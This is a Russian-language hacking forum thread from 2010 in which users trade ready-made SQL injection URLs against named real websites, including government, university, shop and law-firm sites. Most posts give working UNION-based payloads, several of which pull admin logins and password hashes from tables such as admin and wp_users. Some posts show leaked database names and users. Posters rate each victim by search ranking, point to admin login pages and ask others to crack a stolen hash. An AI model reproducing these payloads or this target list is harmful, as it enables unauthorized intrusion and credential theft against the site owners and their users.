SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Code:
    http://www.golfonline.ru/c/pagecont/?id=-181%20OR%20%28SELECT%20COUNT%28*%29%20FROM%20%28SELECT%201%20UNION%20SELECT%202%20UNION%20SELECT%203%29x%20GR
    
    OUP%20BY%20CONCAT%28MID%28VERSION%28%29,%201,%2063%29,%20FLOOR%28RAND%280%29*2%29%29%29%20--
    
    ТИц 50 Pr 3


    Code:
    http://www.keytex.ru/index.php?page=publ_view&id=32+union+select+1,2,database%28%29,4,version%28%29
    тИЦ 10 Pr 3
     
    2 people like this.
  2. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Все сайты сделаны одной фирмой http://weblux.com.ua. И все уязвимые..

    Code:
    http://artbarva.com/index.php?action=services&id=-7+UnIon+selECt+1,2,3,4,version(),6,7,8,9+--+
    Code:
    http://www.kronospan.com.ua/index.php?action=news&id=-48+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login,password),7,8+from+admin--+
    Code:
    http://lwr.com.ua/index.php?action=menu&id=8+and+1=2+union+select+1,2,group_concat(login,0x3a,password),4+from+admin--+
    Code:
    http://legendaclass.com.ua/index.php?action=menu&id=-5+UnIon+selECt+1,2,concat_ws(0x3a,login,password),4+from+admin--+
    Code:
    http://dental.net.ua/index.php?action=events&year=&id=-61+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login,password),7,8+from+admin--+
    Code:
    http://inkata.lp.edu.ua/index.php?action=news&id=-15+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login,password),7,8+from+admin--+--
    Code:
    http://mobaks.ua/index.php?action=shop&table=streng&manufacture=Alphard&id=-6+UnIon+selECt+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--
    P.S. /login.php
    Все пароли к админкам есть в онлайн-базах
     
    #12962 moodoone, 12 Sep 2010
    Last edited: 12 Sep 2010
    1 person likes this.
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.lhfa.state.la.us/news/news_detail.php?ID=116'+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+

    http://www.lhfa.state.la.us/phpinfo.php

    PR-6

    [​IMG]
     
    _________________________
  4. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Code:
    http://www.dialog-service.ru/index.php?page=275+union+select+1,version%28%29,3,4,5,6,7--
    Тиц 20 pr 2
     
  5. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.inverto.tv/products/product.php?section=1&id=-1+and+1=0+union+select+1, 2,3,4,concat_ws(0x3a3a3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22--
     
    1 person likes this.
  6. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    http://www.shambhala-paragliding.com/events/?action=event&id=13+and+1=2+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),8,9,10,11,12,13

    http://www.toursnab.ru/cart.phtml?new=2576+and+1=2+union+select+concat_ws(0x3a3a,version(),user(),database()),2+--+

    http://www.vestich.ru/?p=1&art=1&nid=206+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database())
     
    #12966 brutos, 13 Sep 2010
    Last edited: 13 Sep 2010
  7. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    462
    Likes Received:
    784
    Reputations:
    313
    http://www.wpss.com/president.php?id=-15+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14--
     
  8. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.jetsetmen.com/news.php?id=-200+union+select+1,2,version(),4,5,6,7--
    Code:
    http://www.infobetting.com/bookmakers/news.php?id=-370+union+select+1,2,3,4,5,group_concat(table_name),7,8+from+information_schema.tables--
     
  9. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://volkhov.ru/board/ind.php?pn=0&id_typ=-61+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+[/COLOR]
    5.0.26-log:sentecru_vol:sentecru_vol@localhost
    тиц 20
     
    1 person likes this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    journal.shouxi.net PR: 6
    Code:
    http://journal.shouxi.net/qikan/article.php?id=251686+uNIon+sELEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
    old.minsk.gov.by ТИЦ: 30 PR: 4
    Code:
    http://old.minsk.gov.by/cgi-bin/org_ps.pl?k_org=-144+union+select+concat_ws(0x3a3a,kd_us,name,mail,city,pass,rnd,f_sh,ur_dost),2,3,4+from+forum_users+limit+1,1+--+&mode=doc&doc=144_2
    banff2010.com ТИЦ: 10 PR: 5
    Code:
    http://www.banff2010.com/press.releases.php?news=-229+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10,11,12+from+Admin_Users+--+
    oppenheimlaw.com PR: 3
    Code:
    http://www.oppenheimlaw.com/press-releases.php?new_id=-70'+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
    theoneclickgroup.co.uk ТИЦ: 20 PR: 4
    Code:
    http://www.theoneclickgroup.co.uk/news.php?start=3760&end=3780&view=yes&id=-5046'+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14+--+#newspost
    offaudio.com ТИЦ: 10 PR: 4
    Code:
    http://www.offaudio.com/releases.php?rel=-56+union+select+1,2,3,4,table_name+from+information_schema.tables+--+
    wielandhelicopters.com.au ТИЦ: 0 PR: 4
    Code:
    http://www.wielandhelicopters.com.au/details.php?p_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90+from+cart_payment+--+
    uni-rostock.de ТИЦ: 230 PR: 7
    Code:
    https://www.uni-rostock.de/fakult/manafak/physik/poly/COST_P12/list_reg_individ_detail.php?pers_id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,pers_user_name,pers_pw),11,12,13,14,15+from+person+--+
    1flower.ru PR:1
    Code:
    http://www.1flower.ru/portfolio.php?id=1&ruid=7&pid=-15+union+select+1,2,username,passwd,5,6,7+from+user+--+&tip=project  
    hr-personal.ru
    Code:
    http://hr-personal.ru/publication/index.php?publ_id=-6+UnIOn+sELEct+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+group+by+table_schema+--+
    buyerpower.co.uk
    Code:
    http://www.buyerpower.co.uk/recruitment_detail.php?RuID=-1556+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+--+
     
    2 people like this.
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.1800law1010.com/news2/news.php?id=1+and+substring(version(),1,1)=6+union+select+1,2,group_concat(user_login,char(58),user_pass),4,5+from+wp_users

    :)
     
    _________________________
  12. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.stompdown.ca/index.php?view=videos&type=member&user_id=-62%20%20+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),version(),database()),14,15,16,17,18,19,20,21,22,23,24,25,26,27--&option=com_jomtube&Itemid=58
    Username: stompdow_jo151@localhost
    Version: 5.1.48-log
    Database: stompdow_jo151

    Google PR: 5
     
  13. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Code:
    http://fpkp.ulsu.ru/articles.php?article=-10+UNION+SELECT+1,cast%28version%28%29+as+char%29,3--+

    Code:
    http://www.brokfin.ru/show.php?page=16&id=-26+UNION+SELECT+VERSION%28%29,2--

    ТИЦ 110 PR 4
     
    #12973 0pTik, 13 Sep 2010
    Last edited: 13 Sep 2010
    2 people like this.
  14. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    www.colliers.spb.ru
    ТИЦ: 80, PR: 4

    www.eurica.ru
    ТИЦ: 20, PR: 2

    www.ice-cream.nw.ru
    ТИЦ: 10, PR: 2

    www.russia-hostelling.ru
    ТИЦ: 60, PR: 5

     
    #12974 brutos, 13 Sep 2010
    Last edited: 14 Sep 2010
    1 person likes this.
  15. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.oscilloscope.net/shop/view_film.php?ID=11+and+1=0+UnIon+selECt+1,2,concat_ws(0x3a,ADMIN_EMAIL,ADMIN_PASS),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin+--+
    Шоп, кто хеш снимит киньте в пм..ради интереса )
    ТИЦ : 10
     
    1 person likes this.
  16. 0pTik

    0pTik Banned

    Joined:
    18 Jul 2010
    Messages:
    240
    Likes Received:
    85
    Reputations:
    17
    Code:
    http://www.mitq.org/print/?l=rus&dir=2&news=-73+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    Тиц 30 PR 3
     
    1 person likes this.
  17. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    компьютерные технологии ARTIKS

    http://www.artiks.ru/consultant_text.php?id=-3461+and+1=2+union+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13+--

    version : 4.0.27-log
    user : [email protected]
    database : aryabov
    os : pc-linux-gnu
     
    1 person likes this.
  18. Zombi ****

    Zombi **** Elder - Старейшина

    Joined:
    4 Apr 2009
    Messages:
    166
    Likes Received:
    183
    Reputations:
    17
    http://www.heroworld.net/news.php?id=-957+union+select+1,2,3,version(),5,6,7,8,9,10--

    http://www.m-angel.ru/gallery.php?id=2&gid=-6+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--

    Database Version: 4.1.22
    Database name: a1806_angel
    User name: [email protected]
    ТИЦ10YC(R2) PR2

    http://www.edwardmiller.co.uk/gallery.php?id=-14+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
     
    #12978 Zombi ****, 13 Sep 2010
    Last edited: 13 Sep 2010
    2 people like this.
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.couplesforchrist.us/news.php?id=-189+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15
    http://agcajaoestate.org/news.php?id=5+union+select+1,2,3,4,5
     
    _________________________
  20. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    [COLOR=White]http://www.torgnik.ru/ind.php?pn=1&id_typ=-7+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+[/COLOR]
    4.0.26:torgni:[email protected]
    тиц 10
    PageRank 2
     
    1 person likes this.
Thread Status:
Not open for further replies.